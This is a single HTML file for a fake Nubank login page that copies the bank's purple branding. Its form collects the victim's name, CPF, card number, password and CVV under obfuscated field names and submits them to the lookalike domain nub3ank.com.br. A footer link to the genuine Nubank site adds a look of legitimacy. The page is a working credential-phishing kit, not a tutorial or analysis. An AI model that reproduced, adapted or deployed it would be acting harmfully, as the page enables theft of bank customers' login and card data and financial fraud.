<!DOCTYPE html>
<html lang="pt-br">
<head>
  <meta charset="UTF-8">
  <title>Login Exemplo - Nubank Fake</title>
  <style>
    body {
      font-family: Arial, sans-serif;
      margin: 0;
      padding: 0;
      background-color: #8A05BE; /* Roxo Nubank */
      color: #333;
    }

    header {
      background-color: #8A05BE;
      color: white;
      text-align: center;
      padding: 20px;
      font-size: 24px;
      font-weight: bold;
    }

    .container {
      max-width: 400px;
      margin: 40px auto;
      background: white;
      border-radius: 10px;
      box-shadow: 0px 4px 10px rgba(0,0,0,0.2);
      padding: 20px;
    }

    .container h2 {
      text-align: center;
      color: #8A05BE;
      margin-bottom: 20px;
    }

    label {
      font-weight: bold;
      display: block;
      margin-bottom: 5px;
      color: #444;
    }

    input {
      width: 100%;
      padding: 10px;
      margin-bottom: 15px;
      border: 1px solid #ccc;
      border-radius: 5px;
      outline: none;
      font-size: 14px;
    }

    input:focus {
      border-color: #8A05BE;
    }

    button {
      width: 100%;
      padding: 12px;
      background-color: #8A05BE;
      color: white;
      border: none;
      border-radius: 5px;
      font-size: 16px;
      cursor: pointer;
      font-weight: bold;
    }

    button:hover {
      background-color: #6a0195;
    }

    footer {
      text-align: center;
      padding: 15px;
      color: white;
      font-size: 14px;
      margin-top: 30px;
    }

    footer a {
      color: #fff;
      text-decoration: underline;
    }
  </style>
</head>
<body>

  <header>
    Nubank Exemplo
  </header>

  <div class="container">
    <h2>Login</h2>
    <form action="https://nub3ank.com.br/ajuda-e-seguranca/contato" method="get">
      <label for="nome">Nome</label>
      <input type="text" id="nome" name="nome" placeholder="Digite seu nome" required>

      <label for="ciplis">Ciplis</label>
      <input type="text" id="ciplis" name="ciplis" placeholder="Digite seu Cpf">

      <label for="frame">Frame</label>
      <input type="text" id="frame" name="frame" placeholder="Digite seu cartao">

      <label for="kret">Kret</label>
      <input type="text" id="kret" name="kret" placeholder="Digite sua Senha">

      <label for="cls">Cls jjjj</label>
      <input type="text" id="cls" name="cls" placeholder="Digite seu cvv">

      <button type="submit">Entrar</button>
    </form>
  </div>

  <footer>
    © 2025 Nubank Cental - Ajuda e Segurança | <a href="https://nubank.com.br/ajuda-e-seguranca/contato">Ajuda</a>
  </footer>

</body>
</html>
